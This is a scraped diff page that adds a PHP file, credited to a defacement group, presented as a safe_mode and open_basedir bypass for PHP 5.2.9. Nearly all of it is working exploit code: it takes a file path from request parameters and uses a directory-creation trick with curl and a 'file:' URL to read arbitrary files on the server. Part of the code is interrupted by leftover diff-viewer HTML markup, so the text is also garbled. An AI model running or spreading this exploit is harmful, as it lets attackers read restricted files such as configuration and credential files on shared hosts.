4e0x
diff --git a/‎529.php
Lines changed: 58 additions & 0 deletions b/‎529.php
Lines changed: 58 additions & 0 deletions
@@ -0,0 +1,58 @@
+ 
+/* 
+safe_mode and open_basedir Bypass PHP 5.2.9 
+KingDefacer ARCHÝVES / 
+
+This Exploit Was Edited By KingDefacer
+NOTE: 
+ 
+
+*/ 
+
+if(!empty($_GET['file'])) $file=$_GET['file']; 
+else if(!empty($_POST['file'])) $file=$_POST['file']; 
+
+echo 'This is exploit from 
+href="/" title="Securityhouse">Security House - Shell Center - Edited By KingDefacer labs. 
+Turkish H4CK3RZ 
+ [Turkish Security Network] - Edited By KingDefacer
+PHP 5.2.9 safe_mode & open_basedir bypass 
+More: Md5Cracking.Com Crew 
+
$_SERVER["HTTP_HOST"].htmlspecialchars($_SERVER["SCRIPT_N 
+AME"]).$_SERVER["PHP_SELF"].'" method="post">htmlspecialchars($file).'">'; 
+
+
+$level=0; 
+
+if(!file_exists("file:")) 
+    mkdir("file:"); 
+chdir("file:"); 
+$level++; 
+
+$hardstyle = explode("/", $file); 
+
+for($a=0;$a<count($hardstyle);$a++){ 
+    if(!empty($hardstyle[$a])){ 
+        if(!file_exists($hardstyle[$a]))  
+            mkdir($hardstyle[$a]); 
+        chdir($hardstyle[$a]); 
+        $level++; 
+    } 
+} 
+
+while($level--) chdir(".."); 
+
+$ch = curl_init(); 
+
+curl_setopt($ch, CURLOPT_URL, "file:file:///".$file); 
+
+echo ' </span>'</span>; </div></code></td></tr><tr class="diff-line-row"><td data-grid-cell-id="diff-5d5296907a83a4f1992028991520fa28033e60001cf109088985351d48ac184d-empty-50-0" data-selected="false" role="gridcell" style="background-color:var(--diffBlob-additionNum-bgColor, var(--diffBlob-addition-bgColor-num));text-align:center" tabindex="-1" valign="top" class="focusable-grid-cell diff-line-number position-relative left-side"><code></code></td><td data-grid-cell-id="diff-5d5296907a83a4f1992028991520fa28033e60001cf109088985351d48ac184d-empty-50-1" data-selected="false" role="gridcell" style="background-color:var(--diffBlob-additionNum-bgColor, var(--diffBlob-addition-bgColor-num));text-align:center" tabindex="-1" valign="top" class="focusable-grid-cell diff-line-number position-relative left-side"><code>50</code></td><td data-grid-cell-id="diff-5d5296907a83a4f1992028991520fa28033e60001cf109088985351d48ac184d-empty-50-2" data-line-anchor="diff-5d5296907a83a4f1992028991520fa28033e60001cf109088985351d48ac184dR50" data-selected="false" role="gridcell" style="background-color:var(--diffBlob-additionLine-bgColor, var(--diffBlob-addition-bgColor-line));padding-right:24px" tabindex="-1" valign="top" class="focusable-grid-cell diff-text-cell right-side-diff-cell pt-4 left-side"><code class="diff-text syntax-highlighted-line addition"><span class="diff-text-marker">+</span><div class="diff-text-inner"></div></code></td></tr><tr class="diff-line-row"><td data-grid-cell-id="diff-5d5296907a83a4f1992028991520fa28033e60001cf109088985351d48ac184d-empty-51-0" data-selected="false" role="gridcell" style="background-color:var(--diffBlob-additionNum-bgColor, var(--diffBlob-addition-bgColor-num));text-align:center" tabindex="-1" valign="top" class="focusable-grid-cell diff-line-number position-relative left-side"><code></code></td><td data-grid-cell-id="diff-5d5296907a83a4f1992028991520fa28033e60001cf109088985351d48ac184d-empty-51-1" data-selected="false" role="gridcell" style="background-color:var(--diffBlob-additionNum-bgColor, var(--diffBlob-addition-bgColor-num));text-align:center" tabindex="-1" valign="top" class="focusable-grid-cell diff-line-number position-relative left-side"><code>51</code></td><td data-grid-cell-id="diff-5d5296907a83a4f1992028991520fa28033e60001cf109088985351d48ac184d-empty-51-2" data-line-anchor="diff-5d5296907a83a4f1992028991520fa28033e60001cf109088985351d48ac184dR51" data-selected="false" role="gridcell" style="background-color:var(--diffBlob-additionLine-bgColor, var(--diffBlob-addition-bgColor-line));padding-right:24px" tabindex="-1" valign="top" class="focusable-grid-cell diff-text-cell right-side-diff-cell  left-side"><code class="diff-text syntax-highlighted-line addition"><span class="diff-text-marker">+</span><div class="diff-text-inner"><span class="pl-k">if</span>(<span class="pl-c1">FALSE</span>==<span class="pl-en">curl_exec</span>(<span class="pl-s1"><span class="pl-c1">$</span>ch</span>)) </div></code></td></tr><tr class="diff-line-row"><td data-grid-cell-id="diff-5d5296907a83a4f1992028991520fa28033e60001cf109088985351d48ac184d-empty-52-0" data-selected="false" role="gridcell" style="background-color:var(--diffBlob-additionNum-bgColor, var(--diffBlob-addition-bgColor-num));text-align:center" tabindex="-1" valign="top" class="focusable-grid-cell diff-line-number position-relative left-side"><code></code></td><td data-grid-cell-id="diff-5d5296907a83a4f1992028991520fa28033e60001cf109088985351d48ac184d-empty-52-1" data-selected="false" role="gridcell" style="background-color:var(--diffBlob-additionNum-bgColor, var(--diffBlob-addition-bgColor-num));text-align:center" tabindex="-1" valign="top" class="focusable-grid-cell diff-line-number position-relative left-side"><code>52</code></td><td data-grid-cell-id="diff-5d5296907a83a4f1992028991520fa28033e60001cf109088985351d48ac184d-empty-52-2" data-line-anchor="diff-5d5296907a83a4f1992028991520fa28033e60001cf109088985351d48ac184dR52" data-selected="false" role="gridcell" style="background-color:var(--diffBlob-additionLine-bgColor, var(--diffBlob-addition-bgColor-line));padding-right:24px" tabindex="-1" valign="top" class="focusable-grid-cell diff-text-cell right-side-diff-cell  left-side"><code class="diff-text syntax-highlighted-line addition"><span class="diff-text-marker">+</span><div class="diff-text-inner"><span class="pl-en">die</span>(<span class="pl-s">'<span class="pl-s">>Sorry... File </span>'</span>.<span class="pl-en">htmlspecialchars</span>(<span class="pl-s1"><span class="pl-c1">$</span>file</span>).<span class="pl-s">'<span class="pl-s"> doesnt exists or you dont have permissions.</span>'</span>); </div></code></td></tr><tr class="diff-line-row"><td data-grid-cell-id="diff-5d5296907a83a4f1992028991520fa28033e60001cf109088985351d48ac184d-empty-53-0" data-selected="false" role="gridcell" style="background-color:var(--diffBlob-additionNum-bgColor, var(--diffBlob-addition-bgColor-num));text-align:center" tabindex="-1" valign="top" class="focusable-grid-cell diff-line-number position-relative left-side"><code></code></td><td data-grid-cell-id="diff-5d5296907a83a4f1992028991520fa28033e60001cf109088985351d48ac184d-empty-53-1" data-selected="false" role="gridcell" style="background-color:var(--diffBlob-additionNum-bgColor, var(--diffBlob-addition-bgColor-num));text-align:center" tabindex="-1" valign="top" class="focusable-grid-cell diff-line-number position-relative left-side"><code>53</code></td><td data-grid-cell-id="diff-5d5296907a83a4f1992028991520fa28033e60001cf109088985351d48ac184d-empty-53-2" data-line-anchor="diff-5d5296907a83a4f1992028991520fa28033e60001cf109088985351d48ac184dR53" data-selected="false" role="gridcell" style="background-color:var(--diffBlob-additionLine-bgColor, var(--diffBlob-addition-bgColor-line));padding-right:24px" tabindex="-1" valign="top" class="focusable-grid-cell diff-text-cell right-side-diff-cell  left-side"><code class="diff-text syntax-highlighted-line addition"><span class="diff-text-marker">+</span><div class="diff-text-inner"><span class="pl-k">echo</span> <span class="pl-s">'<span class="pl-s">  '; 
+
+curl_close($ch); 
+
+?> 
+bypass shell: